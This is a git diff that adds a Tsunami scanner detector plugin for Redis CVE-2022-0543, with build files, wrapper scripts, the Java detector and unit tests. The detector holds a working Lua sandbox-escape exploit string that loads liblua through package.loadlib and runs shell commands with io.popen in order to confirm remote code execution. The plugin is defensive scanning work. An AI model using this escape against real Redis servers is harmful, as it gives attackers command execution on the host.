diff --git a/community/detectors/redis_cve_2022_0543/README.md b/community/detectors/redis_cve_2022_0543/README.md new file mode 100644 index 000000000..66e2a2a58 --- /dev/null +++ b/community/detectors/redis_cve_2022_0543/README.md @@ -0,0 +1,22 @@ +# Redis CVE-2022-0543 Vulnerability Detector + +Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker. + +Reginaldo Silva discovered that due to a packaging issue on Debian/Ubuntu, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host. + +References: + +- +- + +This detector connects to a remote Redis server using the [Jedis](https://github.com/redis/jedis) library and sends the payload specified in https://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543. It also utilizes Tsunami's payload generation framework to generated the Linux shell command. + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/redis_cve_2022_0543/build.gradle b/community/detectors/redis_cve_2022_0543/build.gradle new file mode 100644 index 000000000..1a2dda6e0 --- /dev/null +++ b/community/detectors/redis_cve_2022_0543/build.gradle @@ -0,0 +1,65 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami VulnDetector plugin for Redis CVE-2022-0543 vulnerability.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = '0.0.14' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} diff --git a/community/detectors/redis_cve_2022_0543/gradle/wrapper/gradle-wrapper.jar b/community/detectors/redis_cve_2022_0543/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..62d4c0535 Binary files /dev/null and b/community/detectors/redis_cve_2022_0543/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/redis_cve_2022_0543/gradle/wrapper/gradle-wrapper.properties b/community/detectors/redis_cve_2022_0543/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..622ab64a3 --- /dev/null +++ b/community/detectors/redis_cve_2022_0543/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,5 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/redis_cve_2022_0543/gradlew b/community/detectors/redis_cve_2022_0543/gradlew new file mode 100755 index 000000000..fbd7c5158 --- /dev/null +++ b/community/detectors/redis_cve_2022_0543/gradlew @@ -0,0 +1,185 @@ +#!/usr/bin/env sh + +# +# Copyright 2015 the original author or authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +## +## Gradle start up script for UN*X +## +############################################################################## + +# Attempt to set APP_HOME +# Resolve links: $0 may be a link +PRG="$0" +# Need this for relative symlinks. +while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG=`dirname "$PRG"`"/$link" + fi +done +SAVED="`pwd`" +cd "`dirname \"$PRG\"`/" >/dev/null +APP_HOME="`pwd -P`" +cd "$SAVED" >/dev/null + +APP_NAME="Gradle" +APP_BASE_NAME=`basename "$0"` + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD="maximum" + +warn () { + echo "$*" +} + +die () { + echo + echo "$*" + echo + exit 1 +} + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "`uname`" in + CYGWIN* ) + cygwin=true + ;; + Darwin* ) + darwin=true + ;; + MINGW* ) + msys=true + ;; + NONSTOP* ) + nonstop=true + ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD="java" + which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." +fi + +# Increase the maximum file descriptors if we can. +if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then + MAX_FD_LIMIT=`ulimit -H -n` + if [ $? -eq 0 ] ; then + if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then + MAX_FD="$MAX_FD_LIMIT" + fi + ulimit -n $MAX_FD + if [ $? -ne 0 ] ; then + warn "Could not set maximum file descriptor limit: $MAX_FD" + fi + else + warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" + fi +fi + +# For Darwin, add options to specify how the application appears in the dock +if $darwin; then + GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" +fi + +# For Cygwin or MSYS, switch paths to Windows format before running java +if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then + APP_HOME=`cygpath --path --mixed "$APP_HOME"` + CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` + + JAVACMD=`cygpath --unix "$JAVACMD"` + + # We build the pattern for arguments to be converted via cygpath + ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` + SEP="" + for dir in $ROOTDIRSRAW ; do + ROOTDIRS="$ROOTDIRS$SEP$dir" + SEP="|" + done + OURCYGPATTERN="(^($ROOTDIRS))" + # Add a user-defined pattern to the cygpath arguments + if [ "$GRADLE_CYGPATTERN" != "" ] ; then + OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" + fi + # Now convert the arguments - kludge to limit ourselves to /bin/sh + i=0 + for arg in "$@" ; do + CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` + CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option + + if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition + eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` + else + eval `echo args$i`="\"$arg\"" + fi + i=`expr $i + 1` + done + case $i in + 0) set -- ;; + 1) set -- "$args0" ;; + 2) set -- "$args0" "$args1" ;; + 3) set -- "$args0" "$args1" "$args2" ;; + 4) set -- "$args0" "$args1" "$args2" "$args3" ;; + 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; + 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; + 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; + 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; + 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; + esac +fi + +# Escape application args +save () { + for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done + echo " " +} +APP_ARGS=`save "$@"` + +# Collect all arguments for the java command, following the shell quoting and substitution rules +eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" + +exec "$JAVACMD" "$@" diff --git a/community/detectors/redis_cve_2022_0543/gradlew.bat b/community/detectors/redis_cve_2022_0543/gradlew.bat new file mode 100644 index 000000000..5093609d5 --- /dev/null +++ b/community/detectors/redis_cve_2022_0543/gradlew.bat @@ -0,0 +1,104 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%" == "" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%" == "" set DIRNAME=. +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if "%ERRORLEVEL%" == "0" goto init + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto init + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:init +@rem Get command-line arguments, handling Windows variants + +if not "%OS%" == "Windows_NT" goto win9xME_args + +:win9xME_args +@rem Slurp the command line arguments. +set CMD_LINE_ARGS= +set _SKIP=2 + +:win9xME_args_slurp +if "x%~1" == "x" goto execute + +set CMD_LINE_ARGS=%* + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% + +:end +@rem End local scope for the variables with windows NT shell +if "%ERRORLEVEL%"=="0" goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 +exit /b 1 + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/redis_cve_2022_0543/settings.gradle b/community/detectors/redis_cve_2022_0543/settings.gradle new file mode 100644 index 000000000..29c82e738 --- /dev/null +++ b/community/detectors/redis_cve_2022_0543/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'redis_cve_2022_0543' diff --git a/community/detectors/redis_cve_2022_0543/src/main/java/com/google/tsunami/plugins/detectors/cves/Cve20220543Detector.java b/community/detectors/redis_cve_2022_0543/src/main/java/com/google/tsunami/plugins/detectors/cves/Cve20220543Detector.java new file mode 100644 index 000000000..f53ffc95d --- /dev/null +++ b/community/detectors/redis_cve_2022_0543/src/main/java/com/google/tsunami/plugins/detectors/cves/Cve20220543Detector.java @@ -0,0 +1,205 @@ +/* + * Copyright 2022 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.net.HostAndPort; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.BufferedInputStream; +import java.io.BufferedOutputStream; +import java.io.IOException; +import java.net.InetSocketAddress; +import java.net.Socket; +import java.nio.charset.StandardCharsets; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; +import javax.net.SocketFactory; + +/** A VulnDetector plugin for Redis CVE-2022-0543. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "Redis CVE-2022-0543 Detector", + version = "0.1", + description = "VulnDetector for Redis CVE-2022-0543", + author = "shpei1963 (shpei1963@outlook.com)", + bootstrapModule = Cve20220543DetectorBootstrapModule.class) +public final class Cve20220543Detector implements VulnDetector { + + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private static final String EXPLOIT_SCRIPT = + "eval \"local io_l = package.loadlib(\\\"%s\\\", \\\"luaopen_io\\\"); local io = io_l();" + + " local f = io.popen(\\\"%s\\\", \\\"r\\\"); local res = f:read(\\\"*a\\\"); f:close();" + + " return res\" 0\n"; + private static final ImmutableList LIB_LUA_PATHES = + ImmutableList.of("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0"); + + @VisibleForTesting + static final String TITLE = "Redis Lua Sandbox Escape and Remote Code Execution (CVE-2022-0543)"; + + @VisibleForTesting + static final String DESCRIPTION = + "Redis is an open source (BSD licensed), in-memory data structure store, used as a database," + + " cache, and message broker. Due to a packaging issue, Redis is prone to a" + + " (Debian-specific) Lua sandbox escape, which could result in remote code execution."; + + @VisibleForTesting + static final String RECOMMENDATION = + "Upgrade Redis to a fixed version based on" + + " https://security-tracker.debian.org/tracker/CVE-2022-0543"; + + private final Clock utcClock; + private final SocketFactory socketFactory; + private final PayloadGenerator payloadGenerator; + final int CONNECT_TIMEOUT = 5000; + final int READ_TIMEOUT = 2000; + + @Inject + Cve20220543Detector( + @UtcClock Clock utcClock, SocketFactory socketFactory, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.socketFactory = checkNotNull(socketFactory); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("Cve20220543Detector starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(this::isRedisService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isRedisService(NetworkService networkService) { + return networkService.getServiceName().equals("redis"); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + Socket socket = null; + BufferedOutputStream out = null; + BufferedInputStream in = null; + + /** Create socket and connect */ + HostAndPort target = NetworkEndpointUtils.toHostAndPort(networkService.getNetworkEndpoint()); + try { + socket = socketFactory.createSocket(); + socket.connect(new InetSocketAddress(target.getHost(), target.getPort()), CONNECT_TIMEOUT); + socket.setSoTimeout(READ_TIMEOUT); + + out = new BufferedOutputStream(socket.getOutputStream()); + in = new BufferedInputStream(socket.getInputStream()); + } catch (IOException e) { + } + + boolean isVulnerable = true; + /** Detect */ + try { + for (String luaPath : LIB_LUA_PATHES) { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build(); + + // curl is not installed on the tested docker composes, as this is a REFLECTIVE_RCE fallback + // to the printf payload by default + Payload payload = this.payloadGenerator.generateNoCallback(config); + String script = String.format(EXPLOIT_SCRIPT, luaPath, payload.getPayload()); + + out.write(script.getBytes()); + out.flush(); + + // we assume that the response from callback server is less than 2048 + byte[] buffer = new byte[2048]; + + int b = in.read(buffer, 0, buffer.length); + if (b < 1) { + throw new IOException("Unexpected end of stream"); + } + + logger.atInfo().log(buffer.toString()); + isVulnerable = payload.checkIfExecuted(new String(buffer, StandardCharsets.UTF_8)); + if (isVulnerable) { + break; + } + } + + } catch (IOException e) { + logger.atWarning().withCause(e).log("Cannot execute exploit."); + return false; + } + + try { + /** Clean up */ + socket.close(); + } catch (IOException e) { + } + + return isVulnerable; + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2022_0543")) + .setSeverity(Severity.CRITICAL) + .setTitle(TITLE) + .setDescription(DESCRIPTION) + .setRecommendation(RECOMMENDATION)) + .build(); + } +} diff --git a/community/detectors/redis_cve_2022_0543/src/main/java/com/google/tsunami/plugins/detectors/cves/Cve20220543DetectorBootstrapModule.java b/community/detectors/redis_cve_2022_0543/src/main/java/com/google/tsunami/plugins/detectors/cves/Cve20220543DetectorBootstrapModule.java new file mode 100644 index 000000000..3295c21c3 --- /dev/null +++ b/community/detectors/redis_cve_2022_0543/src/main/java/com/google/tsunami/plugins/detectors/cves/Cve20220543DetectorBootstrapModule.java @@ -0,0 +1,33 @@ +/* + * Copyright 2022 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves; + +import com.google.inject.multibindings.OptionalBinder; +import com.google.tsunami.plugin.PluginBootstrapModule; +import javax.net.SocketFactory; + +/** An Guice module that bootstraps the {@link Cve20220543Detector}. */ +public final class Cve20220543DetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + OptionalBinder.newOptionalBinder(binder(), SocketFactory.class) + .setDefault() + .toInstance(SocketFactory.getDefault()); + + registerPlugin(Cve20220543Detector.class); + } +} diff --git a/community/detectors/redis_cve_2022_0543/src/test/java/com/google/tsunami/plugins/detectors/cves/Cve20220543DetectorTest.java b/community/detectors/redis_cve_2022_0543/src/test/java/com/google/tsunami/plugins/detectors/cves/Cve20220543DetectorTest.java new file mode 100644 index 000000000..58c4da8d8 --- /dev/null +++ b/community/detectors/redis_cve_2022_0543/src/test/java/com/google/tsunami/plugins/detectors/cves/Cve20220543DetectorTest.java @@ -0,0 +1,155 @@ +/* + * Copyright 2020 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forIpAndPort; +import static com.google.tsunami.plugins.detectors.cves.Cve20220543Detector.*; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.google.common.collect.ImmutableList; +import com.google.inject.AbstractModule; +import com.google.inject.Guice; +import com.google.inject.Inject; +import com.google.inject.multibindings.OptionalBinder; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.net.Socket; +import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import javax.net.SocketFactory; +import org.junit.Before; +import org.junit.Rule; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; +import org.mockito.junit.MockitoJUnit; +import org.mockito.junit.MockitoRule; + +/** + * Unit tests for {@link Cve20220543Detector}, showing how to test a detector which utilizes the + * payload generator framework. + */ +@RunWith(JUnit4.class) +public final class Cve20220543DetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + @Rule public final MockitoRule mocks = MockitoJUnit.rule(); + + @Inject private Cve20220543Detector detector; + + private final SocketFactory socketFactoryMock = mock(SocketFactory.class); + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Before + public void setUp() throws IOException { + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setSecureRng(testSecureRandom).build(), + new Cve20220543DetectorBootstrapModule(), + new AbstractModule() { + @Override + protected void configure() { + OptionalBinder.newOptionalBinder(binder(), SocketFactory.class) + .setBinding() + .toInstance(socketFactoryMock); + } + }) + .injectMembers(this); + } + + private void getMock(String output) throws IOException { + Socket socket = mock(Socket.class); + + when(socketFactoryMock.createSocket()).thenReturn(socket); + when(socket.getOutputStream()).thenReturn(new ByteArrayOutputStream()); + when(socket.getInputStream()).thenReturn(new ByteArrayInputStream(output.getBytes())); + when(socket.isConnected()).thenReturn(true); + } + + @Test + public void detect_whenVulnerable_reportsVulnerability() throws IOException { + getMock("TSUNAMI_PAYLOAD_STARTffffffffffffffffTSUNAMI_PAYLOAD_END"); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 6379)) + .setServiceName("redis") + .build(); + TargetInfo target = + TargetInfo.newBuilder().addNetworkEndpoints(service.getNetworkEndpoint()).build(); + + DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(target) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2022_0543")) + .setSeverity(Severity.CRITICAL) + .setTitle(TITLE) + .setDescription(DESCRIPTION) + .setRecommendation(RECOMMENDATION)) + .build()); + } + + @Test + public void detect_whenNotVulnerable_doesNotReportVulnerability() throws IOException { + getMock(""); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 6379)) + .setServiceName("redis") + .build(); + TargetInfo target = + TargetInfo.newBuilder().addNetworkEndpoints(service.getNetworkEndpoint()).build(); + + DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } +}